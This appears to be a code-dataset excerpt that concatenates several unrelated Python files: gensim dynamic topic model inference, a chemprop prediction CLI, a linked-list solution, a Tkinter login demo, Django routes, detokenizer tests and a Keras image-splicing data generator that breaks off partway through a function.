# compute post variance, mean
for w in range(0, W):
self.variance[w], self.fwd_variance[w] = self.compute_post_variance(w, self.chain_variance)
self.mean[w], self.fwd_mean[w] = self.compute_post_mean(w, self.chain_variance)
self.zeta = self.update_zeta()
self.e_log_prob = self.compute_expected_log_prob()
    def fit_sslm(self, sstats):
        """Fits variational distribution.

        This is essentially the m-step.
        Maximizes the approximation of the true posterior for a particular topic using the provided sufficient
        statistics. Updates the values using :meth:`~gensim.models.ldaseqmodel.sslm.update_obs` and
        :meth:`~gensim.models.ldaseqmodel.sslm.compute_expected_log_prob`.

        Parameters
        ----------
        sstats : numpy.ndarray
            Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the
            current time slice, expected shape (`self.vocab_len`, `num_topics`).

        Returns
        -------
        float
            The lower bound for the true posterior achieved using the fitted approximate distribution.

        """
        W = self.vocab_len
        bound = 0
        old_bound = 0
        sslm_fit_threshold = 1e-6
        sslm_max_iter = 2
        # Initialized above the threshold so the optimization loop runs at least once.
        converged = sslm_fit_threshold + 1

        # computing variance, fwd_variance
        self.variance, self.fwd_variance = \
            (np.array(x) for x in list(zip(*[self.compute_post_variance(w, self.chain_variance) for w in range(0, W)])))

        # column sum of sstats
        totals = sstats.sum(axis=0)
        iter_ = 0

        # Hard-coded mode switch; the "DIM" branches are placeholders until the
        # Document Influence Model is implemented.
        model = "DTM"
        if model == "DTM":
            bound = self.compute_bound(sstats, totals)
        if model == "DIM":
            bound = self.compute_bound_fixed(sstats, totals)

        logger.info("initial sslm bound is %f", bound)

        # Coordinate ascent: re-optimize the observed variables, then re-evaluate
        # the bound, until the relative improvement drops below the threshold.
        while converged > sslm_fit_threshold and iter_ < sslm_max_iter:
            iter_ += 1
            old_bound = bound
            self.obs, self.zeta = self.update_obs(sstats, totals)

            if model == "DTM":
                bound = self.compute_bound(sstats, totals)
            if model == "DIM":
                bound = self.compute_bound_fixed(sstats, totals)

            # Relative change of the bound; assumes old_bound is non-zero here.
            converged = np.fabs((bound - old_bound) / old_bound)
            logger.info("iteration %i iteration lda seq bound is %f convergence is %f", iter_, bound, converged)

        self.e_log_prob = self.compute_expected_log_prob()
        return bound
def compute_bound(self, sstats, totals):
"""Compute the maximized lower bound achieved for the log probability of the true posterior.
Uses the formula presented in the appendix of the DTM paper (formula no. 5).
Parameters
----------
sstats : numpy.ndarray
Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the first
time slice, expected shape (`self.vocab_len`, `num_topics`).
totals : list of int of length `len(self.time_slice)`
The totals for each time slice.
Returns
-------
float
The maximized lower bound.
"""
w = self.vocab_len
t = self.num_time_slices
term_1 = 0
term_2 = 0
term_3 = 0
val = 0
ent = 0
chain_variance = self.chain_variance
# computing mean, fwd_mean
self.mean, self.fwd_mean = \
(np.array(x) for x in zip(*[self.compute_post_mean(w, self.chain_variance) for w in range(0, w)]))
self.zeta = self.update_zeta()
for w in range(0, w):
val += (self.variance[w][0] - self.variance[w][t]) / 2 * chain_variance
logger.info("Computing bound, all times")
for t in range(1, t + 1):
term_1 = 0.0
term_2 = 0.0
ent = 0.0
for w in range(0, w):
m = self.mean[w][t]
prev_m = self.mean[w][t - 1]
v = self.variance[w][t]
# w_phi_l is only used in Document Influence Model; the values are always zero in this case
# w_phi_l = sslm.w_phi_l[w][t - 1]
# exp_i = np.exp(-prev_m)
# term_1 += (np.power(m - prev_m - (w_phi_l * exp_i), 2) / (2 * chain_variance)) -
# (v / chain_variance) - np.log(chain_variance)
term_1 += \
(np.power(m - prev_m, 2) / (2 * chain_variance)) - (v / chain_variance) - np.log(chain_variance)
term_2 += sstats[w][t - 1] * m
ent += np.log(v) / 2 # note the 2pi's cancel with term1 (see doc)
term_3 = -totals[t - 1] * np.log(self.zeta[t - 1])
val += term_2 + term_3 + ent - term_1
return val
    def update_obs(self, sstats, totals):
        """Optimize the bound with respect to the observed variables.

        TODO:
        This is by far the slowest function in the whole algorithm.
        Replacing or improving the performance of this would greatly speed things up.

        Parameters
        ----------
        sstats : numpy.ndarray
            Sufficient statistics for a particular topic. Corresponds to matrix beta in the linked paper for the first
            time slice, expected shape (`self.vocab_len`, `num_topics`).
        totals : list of int of length `len(self.time_slice)`
            The totals for each time slice.

        Returns
        -------
        (numpy.ndarray of float, numpy.ndarray of float)
            The updated optimized values for obs and the zeta variational parameter.

        """
        OBS_NORM_CUTOFF = 2
        STEP_SIZE = 0.01
        TOL = 1e-3

        W = self.vocab_len
        T = self.num_time_slices

        runs = 0
        # One row per time slice: derivative of the posterior mean w.r.t. each obs entry.
        mean_deriv_mtx = np.resize(np.zeros(T * (T + 1)), (T, T + 1))

        norm_cutoff_obs = None
        for w in range(0, W):
            w_counts = sstats[w]
            counts_norm = 0
            # now we find L2 norm of w_counts
            for i in range(0, len(w_counts)):
                counts_norm += w_counts[i] * w_counts[i]

            counts_norm = np.sqrt(counts_norm)

            # Rare words (small counts norm) skip the expensive optimization once a
            # cached vector exists.
            # NOTE(review): this looks inverted compared with Blei's C code, which
            # copies the cached `norm_cutoff_obs` INTO `obs`; here the cache is
            # refreshed from the current obs instead -- confirm against the DTM C
            # implementation.
            if counts_norm < OBS_NORM_CUTOFF and norm_cutoff_obs is not None:
                obs = self.obs[w]
                norm_cutoff_obs = np.copy(obs)
            else:
                if counts_norm < OBS_NORM_CUTOFF:
                    # Treat very rare words as having zero counts for the optimization.
                    w_counts = np.zeros(len(w_counts))

                # TODO: apply lambda function
                for t in range(0, T):
                    mean_deriv = mean_deriv_mtx[t]
                    mean_deriv = self.compute_mean_deriv(w, t, mean_deriv)
                    mean_deriv_mtx[t] = mean_deriv

                deriv = np.zeros(T)
                args = self, w_counts, totals, mean_deriv_mtx, w, deriv
                obs = self.obs[w]
                model = "DTM"

                if model == "DTM":
                    # slowest part of method: conjugate-gradient minimization of f_obs
                    obs = optimize.fmin_cg(
                        f=f_obs, fprime=df_obs, x0=obs, gtol=TOL, args=args, epsilon=STEP_SIZE, disp=0
                    )
                if model == "DIM":
                    pass
                runs += 1

                # Seed the rare-word cache with the freshly optimized vector.
                if counts_norm < OBS_NORM_CUTOFF:
                    norm_cutoff_obs = obs

                self.obs[w] = obs

        self.zeta = self.update_zeta()
        return self.obs, self.zeta
def compute_mean_deriv(self, word, time, deriv):
"""Helper functions for optimizing a function.
Compute the derivative of:
.. :math::
E[\beta_{t,w}]/d obs_{s,w} for t = 1:T.
Parameters
----------
word : int
The word's ID.
time : int
The time slice.
deriv : list of float
Derivative for each time slice.
Returns
-------
list of float
Mean derivative for each time slice.
"""
T = self.num_time_slices
fwd_variance = self.variance[word]
deriv[0] = 0
# forward pass
for t in range(1, T + 1):
if self.obs_variance > 0.0:
w = self.obs_variance / (fwd_variance[t - 1] + self.chain_variance + self.obs_variance)
else:
w = 0.0
val = w * deriv[t - 1]
if time == t - 1:
val += (1 - w)
deriv[t] = val
for t in range(T - 1, -1, -1):
if self.chain_variance == 0.0:
w = 0.0
else:
w = self.chain_variance / (fwd_variance[t] + self.chain_variance)
deriv[t] = w * deriv[t] + (1 - w) * deriv[t + 1]
return deriv
    def compute_obs_deriv(self, word, word_counts, totals, mean_deriv_mtx, deriv):
        """Derivation of obs which is used in derivative function `df_obs` while optimizing.

        Parameters
        ----------
        word : int
            The word's ID.
        word_counts : list of int
            Total word counts for each time slice.
        totals : list of int of length `len(self.time_slice)`
            The totals for each time slice.
        mean_deriv_mtx : list of float
            Mean derivative for each time slice.
        deriv : list of float
            Mean derivative for each time slice.

        Returns
        -------
        list of float
            Mean derivative for each time slice.

        """
        # flag
        init_mult = 1000

        T = self.num_time_slices

        mean = self.mean[word]
        variance = self.variance[word]

        # only used for DIM mode
        # w_phi_l = self.w_phi_l[word]
        # m_update_coeff = self.m_update_coeff[word]

        # temp_vector holds temporary zeta values
        self.temp_vect = np.zeros(T)

        # Precompute exp(mean + variance / 2) for every slice (the zeta numerators).
        for u in range(0, T):
            self.temp_vect[u] = np.exp(mean[u + 1] + variance[u + 1] / 2)

        # deriv[t] accumulates the gradient of the bound w.r.t. obs[t].
        for t in range(0, T):
            mean_deriv = mean_deriv_mtx[t]
            term1 = 0
            term2 = 0
            term3 = 0
            term4 = 0

            for u in range(1, T + 1):
                mean_u = mean[u]
                mean_u_prev = mean[u - 1]
                dmean_u = mean_deriv[u]
                dmean_u_prev = mean_deriv[u - 1]

                # Chain smoothness term and data-fit term of the gradient.
                term1 += (mean_u - mean_u_prev) * (dmean_u - dmean_u_prev)
                term2 += (word_counts[u - 1] - (totals[u - 1] * self.temp_vect[u - 1] / self.zeta[u - 1])) * dmean_u

                model = "DTM"
                if model == "DIM":
                    # do some stuff
                    pass

            if self.chain_variance:
                term1 = - (term1 / self.chain_variance)
                # Prior on the initial mean, scaled down by init_mult.
                term1 = term1 - (mean[0] * mean_deriv[0]) / (init_mult * self.chain_variance)
            else:
                term1 = 0.0

            # term3 / term4 stay zero until DIM mode is implemented.
            deriv[t] = term1 + term2 + term3 + term4

        return deriv
class LdaPost(utils.SaveLoad):
    """Posterior values associated with each set of documents.

    TODO: use **<NAME>: Online Learning for Latent Dirichlet Allocation, NIPS 2010.**
    to update phi, gamma. End game would be to somehow replace LdaPost entirely with LdaModel.

    """

    def __init__(self, doc=None, lda=None, max_doc_len=None, num_topics=None, gamma=None, lhood=None):
        """Initialize the posterior value structure for the given LDA model.

        Parameters
        ----------
        doc : list of (int, int)
            A BOW representation of the document. Each element in the list is a pair of a word's ID and its number
            of occurences in the document.
        lda : :class:`~gensim.models.ldamodel.LdaModel`, optional
            The underlying LDA model.
        max_doc_len : int, optional
            The maximum number of words in a document.
        num_topics : int, optional
            Number of topics discovered by the LDA model.
        gamma : numpy.ndarray, optional
            Topic weight variational parameters for each document. If not supplied, it will be inferred from the model.
        lhood : float, optional
            The log likelihood lower bound.

        """
        self.doc = doc
        self.lda = lda
        self.gamma = gamma
        self.lhood = lhood
        if self.gamma is None:
            self.gamma = np.zeros(num_topics)
        if self.lhood is None:
            # One slot per topic plus one extra for the gamma normalization term.
            self.lhood = np.zeros(num_topics + 1)

        if max_doc_len is not None and num_topics is not None:
            # Variational multinomial parameters (and logs), one row per word position.
            self.phi = np.resize(np.zeros(max_doc_len * num_topics), (max_doc_len, num_topics))
            self.log_phi = np.resize(np.zeros(max_doc_len * num_topics), (max_doc_len, num_topics))

        # the following are class variables which are to be integrated during Document Influence Model
        self.doc_weight = None
        self.renormalized_doc_weight = None

    def update_phi(self, doc_number, time):
        """Update variational multinomial parameters, based on a document and a time-slice.

        This is done based on the original Blei-LDA paper, where:
        log_phi := beta * exp(Ψ(gamma)), over every topic for every word.

        TODO: incorporate lee-sueng trick used in
        **<NAME>: Algorithms for non-negative matrix factorization, NIPS 2001**.

        Parameters
        ----------
        doc_number : int
            Document number. Unused.
        time : int
            Time slice. Unused.

        Returns
        -------
        (list of float, list of float)
            Multinomial parameters, and their logarithm, for each word in the document.

        """
        num_topics = self.lda.num_topics
        # digamma values
        dig = np.zeros(num_topics)

        for k in range(0, num_topics):
            dig[k] = digamma(self.gamma[k])

        n = 0  # keep track of iterations for phi, log_phi
        for word_id, count in self.doc:
            # `count` is not used here; word multiplicity is applied in update_gamma.
            for k in range(0, num_topics):
                self.log_phi[n][k] = dig[k] + self.lda.topics[word_id][k]

            log_phi_row = self.log_phi[n]
            phi_row = self.phi[n]

            # log normalize (logsumexp over the row for numerical stability)
            v = log_phi_row[0]
            for i in range(1, len(log_phi_row)):
                v = np.logaddexp(v, log_phi_row[i])

            # subtract every element by v
            log_phi_row = log_phi_row - v
            phi_row = np.exp(log_phi_row)
            self.log_phi[n] = log_phi_row
            self.phi[n] = phi_row
            n += 1  # increase iteration

        return self.phi, self.log_phi

    def update_gamma(self):
        """Update variational dirichlet parameters.

        This operations is described in the original Blei LDA paper:
        gamma = alpha + sum(phi), over every topic for every word.

        Returns
        -------
        list of float
            The updated gamma parameters for each word in the document.

        """
        self.gamma = np.copy(self.lda.alpha)
        n = 0  # keep track of number of iterations for phi, log_phi
        for word_id, count in self.doc:
            phi_row = self.phi[n]
            for k in range(0, self.lda.num_topics):
                # phi weighted by the word's count in the document.
                self.gamma[k] += phi_row[k] * count

            n += 1

        return self.gamma

    def init_lda_post(self):
        """Initialize variational posterior. """
        total = sum(count for word_id, count in self.doc)
        # Uniform start: gamma spread evenly, phi uniform over topics.
        self.gamma.fill(self.lda.alpha[0] + float(total) / self.lda.num_topics)
        self.phi[:len(self.doc), :] = 1.0 / self.lda.num_topics
        # doc_weight used during DIM
        # ldapost.doc_weight = None

    def compute_lda_lhood(self):
        """Compute the log likelihood bound.

        Returns
        -------
        float
            The optimal lower bound for the true posterior using the approximate distribution.

        """
        num_topics = self.lda.num_topics
        gamma_sum = np.sum(self.gamma)

        # to be used in DIM
        # sigma_l = 0
        # sigma_d = 0

        # Dirichlet normalization term; stored in the extra last slot of lhood.
        lhood = gammaln(np.sum(self.lda.alpha)) - gammaln(gamma_sum)
        self.lhood[num_topics] = lhood

        # influence_term = 0
        digsum = digamma(gamma_sum)

        model = "DTM"  # noqa:F841
        for k in range(0, num_topics):
            # below code only to be used in DIM mode
            # if ldapost.doc_weight is not None and (model == "DIM" or model == "fixed"):
            #     influence_topic = ldapost.doc_weight[k]
            #     influence_term = \
            #         - ((influence_topic * influence_topic + sigma_l * sigma_l) / 2.0 / (sigma_d * sigma_d))

            # E[log theta_k] under the variational Dirichlet.
            e_log_theta_k = digamma(self.gamma[k]) - digsum
            lhood_term = \
                (self.lda.alpha[k] - self.gamma[k]) * e_log_theta_k + \
                gammaln(self.gamma[k]) - gammaln(self.lda.alpha[k])
            # TODO: check why there's an IF
            n = 0
            for word_id, count in self.doc:
                if self.phi[n][k] > 0:
                    lhood_term += \
                        count * self.phi[n][k] * (e_log_theta_k + self.lda.topics[word_id][k] - self.log_phi[n][k])
                n += 1
            self.lhood[k] = lhood_term
            lhood += lhood_term

            # in case of DIM add influence term
            # lhood += influence_term

        return lhood

    def fit_lda_post(self, doc_number, time, ldaseq, LDA_INFERENCE_CONVERGED=1e-8,
                     lda_inference_max_iter=25, g=None, g3_matrix=None, g4_matrix=None, g5_matrix=None):
        """Posterior inference for lda.

        Parameters
        ----------
        doc_number : int
            The documents number.
        time : int
            Time slice.
        ldaseq : object
            Unused.
        LDA_INFERENCE_CONVERGED : float
            Epsilon value used to check whether the inference step has sufficiently converged.
        lda_inference_max_iter : int
            Maximum number of iterations in the inference step.
        g : object
            Unused. Will be useful when the DIM model is implemented.
        g3_matrix: object
            Unused. Will be useful when the DIM model is implemented.
        g4_matrix: object
            Unused. Will be useful when the DIM model is implemented.
        g5_matrix: object
            Unused. Will be useful when the DIM model is implemented.

        Returns
        -------
        float
            The optimal lower bound for the true posterior using the approximate distribution.

        """
        self.init_lda_post()
        # sum of counts in a doc
        total = sum(count for word_id, count in self.doc)

        model = "DTM"
        if model == "DIM":
            # if in DIM then we initialise some variables here
            pass

        lhood = self.compute_lda_lhood()
        lhood_old = 0
        converged = 0
        iter_ = 0

        # first iteration starts here
        iter_ += 1
        lhood_old = lhood
        self.gamma = self.update_gamma()

        model = "DTM"

        # NOTE(review): `sslm` here is presumably the module-level class object,
        # which is never None, so the first branch always runs -- confirm intent.
        if model == "DTM" or sslm is None:
            self.phi, self.log_phi = self.update_phi(doc_number, time)
        elif model == "DIM" and sslm is not None:
            self.phi, self.log_phi = self.update_phi_fixed(doc_number, time, sslm, g3_matrix, g4_matrix, g5_matrix)

        lhood = self.compute_lda_lhood()
        # Relative change of the likelihood bound, normalized by the word total.
        converged = np.fabs((lhood_old - lhood) / (lhood_old * total))

        while converged > LDA_INFERENCE_CONVERGED and iter_ <= lda_inference_max_iter:

            iter_ += 1
            lhood_old = lhood
            self.gamma = self.update_gamma()
            model = "DTM"

            if model == "DTM" or sslm is None:
                self.phi, self.log_phi = self.update_phi(doc_number, time)
            elif model == "DIM" and sslm is not None:
                self.phi, self.log_phi = self.update_phi_fixed(doc_number, time, sslm, g3_matrix, g4_matrix, g5_matrix)

            lhood = self.compute_lda_lhood()
            converged = np.fabs((lhood_old - lhood) / (lhood_old * total))

        return lhood

    def update_lda_seq_ss(self, time, doc, topic_suffstats):
        """Update lda sequence sufficient statistics from an lda posterior.

        This is very similar to the :meth:`~gensim.models.ldaseqmodel.LdaPost.update_gamma` method and uses
        the same formula.

        Parameters
        ----------
        time : int
            The time slice.
        doc : list of (int, float)
            Unused but kept here for backwards compatibility. The document set in the constructor (`self.doc`) is used
            instead.
        topic_suffstats : list of float
            Sufficient statistics for each topic.

        Returns
        -------
        list of float
            The updated sufficient statistics for each topic.

        """
        num_topics = self.lda.num_topics

        for k in range(0, num_topics):
            topic_ss = topic_suffstats[k]
            n = 0
            for word_id, count in self.doc:
                # Accumulate expected counts for this word/time under topic k.
                topic_ss[word_id][time] += count * self.phi[n][k]
                n += 1
            topic_suffstats[k] = topic_ss

        return topic_suffstats
# the following functions are used in update_obs as the objective function.
def f_obs(x, *args):
    """Objective minimized when optimizing the observed variables for one word.

    Parameters
    ----------
    x : list of float
        The obs values for this word.
    sslm : :class:`~gensim.models.ldaseqmodel.sslm`
        The State Space Language Model for DTM.
    word_counts : list of int
        Total word counts for each time slice.
    totals : list of int of length `len(self.time_slice)`
        The totals for each time slice.
    mean_deriv_mtx : list of float
        Mean derivative for each time slice.
    word : int
        The word's ID.
    deriv : list of float
        Mean derivative for each time slice.

    Returns
    -------
    list of float
        The value of the objective function evaluated at point `x`.

    """
    sslm, word_counts, totals, mean_deriv_mtx, word, deriv = args
    init_mult = 1000  # prior scaling on the t = 0 mean

    num_slices = len(x)

    # Refresh the chain's posterior mean for this word under the candidate obs.
    sslm.obs[word] = x
    sslm.mean[word], sslm.fwd_mean[word] = sslm.compute_post_mean(word, sslm.chain_variance)
    mean = sslm.mean[word]
    variance = sslm.variance[word]

    # Accumulate the quadratic smoothness penalty and the data-fit term.
    smoothness = 0
    data_fit = 0
    for t in range(1, num_slices + 1):
        step = mean[t] - mean[t - 1]
        smoothness += step * step
        data_fit += (
            word_counts[t - 1] * mean[t]
            - totals[t - 1] * np.exp(mean[t] + variance[t] / 2) / sslm.zeta[t - 1]
        )

    if sslm.chain_variance > 0.0:
        smoothness = - (smoothness / (2 * sslm.chain_variance))
        smoothness = smoothness - mean[0] * mean[0] / (2 * init_mult * sslm.chain_variance)
    else:
        smoothness = 0.0

    # The two extra terms of the DIM objective are zero in plain DTM mode.
    return -(smoothness + data_fit)
def df_obs(x, *args):
    """Derivative of the objective function which optimises obs.

    Parameters
    ----------
    x : list of float
        The obs values for this word.
    sslm : :class:`~gensim.models.ldaseqmodel.sslm`
        The State Space Language Model for DTM.
    word_counts : list of int
        Total word counts for each time slice.
    totals : list of int of length `len(self.time_slice)`
        The totals for each time slice.
    mean_deriv_mtx : list of float
        Mean derivative for each time slice.
    word : int
        The word's ID.
    deriv : list of float
        Mean derivative for each time slice.

    Returns
    -------
    list of float
        The derivative of the objective function evaluated at point `x`.

    """
    sslm, word_counts, totals, mean_deriv_mtx, word, deriv = args

    # Refresh the posterior mean for the candidate obs before differentiating.
    sslm.obs[word] = x
    sslm.mean[word], sslm.fwd_mean[word] = sslm.compute_post_mean(word, sslm.chain_variance)

    model = "DTM"
    if model == "DTM":
        deriv = sslm.compute_obs_deriv(word, word_counts, totals, mean_deriv_mtx, deriv)
    elif model == "DIM":
        # BUGFIX: the old branch referenced an undefined name `p` (silenced with
        # noqa:F821) and would have raised NameError if ever reached; fail loudly
        # instead until DIM mode is actually implemented.
        raise NotImplementedError("DIM mode is not implemented")

    # The optimizer minimizes, so negate the gradient of the (maximized) bound.
    return np.negative(deriv)
| StarcoderdataPython |
4868492 | from argparse import ArgumentParser
from chemprop.parsing import update_checkpoint_args
from chemprop.sklearn_predict import predict_sklearn
if __name__ == '__main__':
    # Command-line entry point: predict with a trained scikit-learn model.
    parser = ArgumentParser()
    # Input/output CSV paths.
    parser.add_argument('--test_path', type=str, required=True,
                        help='Path to CSV file containing testing data for which predictions will be made')
    parser.add_argument('--preds_path', type=str, required=True,
                        help='Path to CSV file where predictions will be saved')
    # Task and model selection.
    parser.add_argument('--dataset_type', type=str, required=True, choices=['classification', 'regression'],
                        help='Type of dataset')
    parser.add_argument('--model_type', type=str, choices=['random_forest', 'svm'], required=True,
                        help='scikit-learn model to use')
    # Either a single checkpoint file or a directory of checkpoints may be given.
    parser.add_argument('--checkpoint_path', type=str, default=None,
                        help='Path to model checkpoint (.pkl file)')
    parser.add_argument('--checkpoint_dir', type=str, default=None,
                        help='Path to directory containing model checkpoints (.pkl file)')
    # Morgan fingerprint featurization settings.
    parser.add_argument('--radius', type=int, default=2,
                        help='Morgan fingerprint radius')
    parser.add_argument('--num_bits', type=int, default=2048,
                        help='Number of bits in morgan fingerprint')
    parser.add_argument('--num_tasks', type=int, required=True,
                        help='Number of tasks the trained model makes predictions for')
    args = parser.parse_args()

    # Resolve checkpoint_path/checkpoint_dir into a list of .pkl checkpoints.
    update_checkpoint_args(args, ext='pkl')

    predict_sklearn(args)
| StarcoderdataPython |
1777421 | <gh_stars>0
# -*- coding:utf8 -*-
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def partition(self, head, x):
        """
        :type head: ListNode
        :type x: int
        :rtype: ListNode
        """
        # Build two dummy-headed chains -- nodes smaller than x, and the rest --
        # then stitch them together.  Relative order within each chain is kept.
        small_dummy = ListNode(None)
        large_dummy = ListNode(None)
        small_tail, large_tail = small_dummy, large_dummy

        node = head
        while node:
            nxt = node.next
            node.next = None  # detach so each chain stays properly terminated
            if node.val < x:
                small_tail.next = node
                small_tail = node
            else:
                large_tail.next = node
                large_tail = node
            node = nxt

        # Append the >= x chain after the < x chain.
        small_tail.next = large_dummy.next
        return small_dummy.next
| StarcoderdataPython |
6505641 |
import bs4
import dataclasses
import typing
@dataclasses.dataclass
class Tag():
    """A scraped tag; ``name`` holds the anchor's display text."""
    name: str
def _scrape_tag(soup: bs4.BeautifulSoup) -> typing.List[Tag]:
    """Extract the tags from a parsed page, skipping the trailing anchor."""
    tag_block = soup.find(class_='tag')
    # Last <a> is dropped -- presumably not an actual tag; confirm against the page markup.
    anchors = tag_block.find_all('a')[:-1]
    return [Tag(anchor.text) for anchor in anchors]
| StarcoderdataPython |
1762370 | <reponame>anliven/Reading-Code-Learning-Python
# -*- coding: utf-8 -*-
import tkinter
root = tkinter.Tk()
root.wm_title("Tkinter04 Demo")
label1 = tkinter.Label(root, text=u"账号:").grid(row=0, sticky="w")
label2 = tkinter.Label(root, text=u"密码:").grid(row=1, sticky="w")
label3 = tkinter.Label(root, text=u"")
var = tkinter.Variable()
var.set("tester")
entry1 = tkinter.Entry(root, textvariable=var) # textvariable属性绑定变量
entry2 = tkinter.Entry(root)
entry2["show"] = "*" # 设置show属性,实现“不可见输入”
entry1.grid(row=0, column=1, sticky="e")
entry2.grid(row=1, column=1, sticky="e")
label3.grid(row=3, column=1, sticky="w")
def reg():
    """Validate the typed credentials and report the result in label3."""
    # get() reads the current contents of the two entry widgets.
    username, password = entry1.get(), entry2.get()
    if username == "root" and password == "password":
        label3["text"] = u"登录成功"
    else:
        label3["text"] = u"用户名或密码错误"
        # Clear both fields so the user can retry.
        entry1.delete(0, len(username))
        entry2.delete(0, len(password))
# Login button triggers the credential check, then enter the event loop.
btn = tkinter.Button(root, text=u"登录", command=reg)
btn.grid(row=2, column=1, sticky="e")
root.minsize(180, 80)
root.mainloop()
# ### grid布局
# grid()函数:
# - 参数row :指定位于的行,从0开始;
# - 参数column :指定位于的列,从0开始;
# - 参数sticky :组件开始的方向,“n,s,w,e”表示上下左右;
# - 参数ipadx和ipady :内边距的x方向与y方向,默认边距是0;
# - 参数padx和pady :外边距的x方向与y方向,默认边距是0;
# - 参数rowspan和columnspan :表示跨越的行数和列数;
#
# ### 注意
# pack布局和grid布局不能同时使用;
# 对于较复杂的布局,建议使用grid布局;
#
# ### 输入框(Entry)
# 获取输入的文本信息;
# 具体信息可查看源码文件__init__.py中的Entry类(“Python安装目录\Lib\tkinter\__init__.py”);
# get()方法获取输入框的内容,使用时不需要任何参数;
| StarcoderdataPython |
1636301 | # -*- coding:utf-8 -*-
"""
Weibo Api
"""
from django.urls import path
from weibo.views.weibo import (
WeiboCreateAPIView,
WeiboListAPIView,
WeiboDetailApiView
)
urlpatterns = [
    # URL prefix: /api/v1/weibo/weibo/
    path("create", WeiboCreateAPIView.as_view(), name="create"),
    path("list", WeiboListAPIView.as_view(), name="list"),
    path("<int:pk>", WeiboDetailApiView.as_view(), name="detail"),
]
| StarcoderdataPython |
243605 | <gh_stars>0
#!/usr/bin/env python3
# Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Tests decoding a proto with tokenized fields."""
import unittest
from pw_tokenizer_tests.detokenize_proto_test_pb2 import TheMessage
from pw_tokenizer import detokenize, encode, tokens
from pw_tokenizer.proto import detokenize_fields
# Detokenizer shared by all tests below: a database with a single known entry.
_DATABASE = tokens.Database(
    [tokens.TokenizedStringEntry(0xAABBCCDD, "Luke, we're gonna have %s")])
_DETOKENIZER = detokenize.Detokenizer(_DATABASE)
class TestDetokenizeProtoFields(unittest.TestCase):
    """Tests detokenizing optionally tokenized proto fields."""
    def test_plain_text(self) -> None:
        # A field with no token data passes through unchanged.
        proto = TheMessage(message=b'boring conversation anyway!')
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message, b'boring conversation anyway!')

    def test_binary(self) -> None:
        # Raw binary form: little-endian token 0xAABBCCDD followed by the
        # encoded '%s' argument (\x07 prefixes the 7-byte string "company").
        proto = TheMessage(message=b'\xDD\xCC\xBB\xAA\x07company')
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message, b"Luke, we're gonna have company")

    def test_base64(self) -> None:
        # Same token payload, but prefixed-Base64 encoded.
        base64 = encode.prefixed_base64(b'\xDD\xCC\xBB\xAA\x07company')
        proto = TheMessage(message=base64.encode())
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message, b"Luke, we're gonna have company")

    def test_plain_text_with_prefixed_base64(self) -> None:
        # Base64 tokens embedded inside plain text are replaced in place.
        base64 = encode.prefixed_base64(b'\xDD\xCC\xBB\xAA\x09pancakes!')
        proto = TheMessage(message=f'Good morning, {base64}'.encode())
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message,
                         b"Good morning, Luke, we're gonna have pancakes!")

    def test_unknown_token_not_utf8(self) -> None:
        # An unrecognized, non-UTF-8 payload is rendered as prefixed Base64.
        proto = TheMessage(message=b'\xFE\xED\xF0\x0D')
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message.decode(),
                         encode.prefixed_base64(b'\xFE\xED\xF0\x0D'))

    def test_only_control_characters(self) -> None:
        # All-control-character payloads are also rendered as prefixed Base64.
        proto = TheMessage(message=b'\1\2\3\4')
        detokenize_fields(_DETOKENIZER, proto)
        self.assertEqual(proto.message.decode(),
                         encode.prefixed_base64(b'\1\2\3\4'))
if __name__ == '__main__':
    # Allow running this test module directly with `python`.
    unittest.main()
| StarcoderdataPython |
105776 | import numpy as np
import keras
import json
from tqdm import tqdm
import cv2
import random
import matplotlib.pyplot as plt
from keras.applications.vgg16 import preprocess_input
from keras.preprocessing import image as keras_image
import pickle
def augment_patch(patch, augmentation):
    """Apply the named geometric augmentation to a patch; unknown names are identity."""
    transforms = {
        'H-Flip': np.fliplr,
        'V-Flip': np.flipud,
        '90': lambda p: np.rot90(p, 1),
        '180': lambda p: np.rot90(p, 2),
        '270': lambda p: np.rot90(p, 3),
    }
    transform = transforms.get(augmentation, lambda p: p)
    return transform(patch)
def length(list_IDs, batch_size):
    'Denotes the number of batches per epoch'
    # Integer floor division, equivalent to int(np.floor(len / batch_size)).
    return len(list_IDs) // batch_size
def load_image_paths(image_categories):
    """Collect panel image paths whose classification falls in `image_categories`."""
    # Training-set DOIs and the per-panel classification lookup.
    with open('../train_pdfs.pkl', 'rb') as f:
        pdfs = pickle.load(f)
    with open('../from_scratch_classification.json', 'r') as f:
        cls_type = json.load(f)
    list_IDs = []
    for doi in tqdm(pdfs):
        for panel,cls in cls_type[doi].items():
            if cls in image_categories:
                # NOTE: cluster-specific absolute path is hard-coded here.
                path = '/nas/medifor/esabir/scientific_integrity/from_scratch/from_scratch_panels/'+doi+'/'+panel
                list_IDs += [path]
    return list_IDs
def on_epoch_end(list_IDs):
    'Updates indexes after each epoch'
    # A freshly shuffled ordering of positions 0..len(list_IDs) - 1.
    return np.random.permutation(len(list_IDs))
def get_batch(indexes, index, list_IDs, batch_size, resize_dim, dim, n_channels, augmentation_list):
    """Assemble batch number `index` from the shuffled `indexes` ordering."""
    # Slice out this batch's positions, map them to IDs, then build the arrays.
    batch_positions = indexes[index * batch_size:(index + 1) * batch_size]
    batch_ids = [list_IDs[k] for k in batch_positions]
    X, y, y1, y2 = data_generation(batch_ids, batch_size, resize_dim, dim, n_channels, augmentation_list)
    return X, y, y1, y2
def create_spliced_manipulation(img, resize_dim, augmentation_list):
    """Copy a random patch of `img` to another location (with a random augmentation).

    Returns the manipulated image plus three ground-truth masks: the 3-channel
    mask (copy / source / background), a similarity mask and a manipulation mask.
    """
    img = cv2.resize(img, resize_dim)
    h, w, ch = img.shape
    # Pad each dimension up to the next multiple of 16.
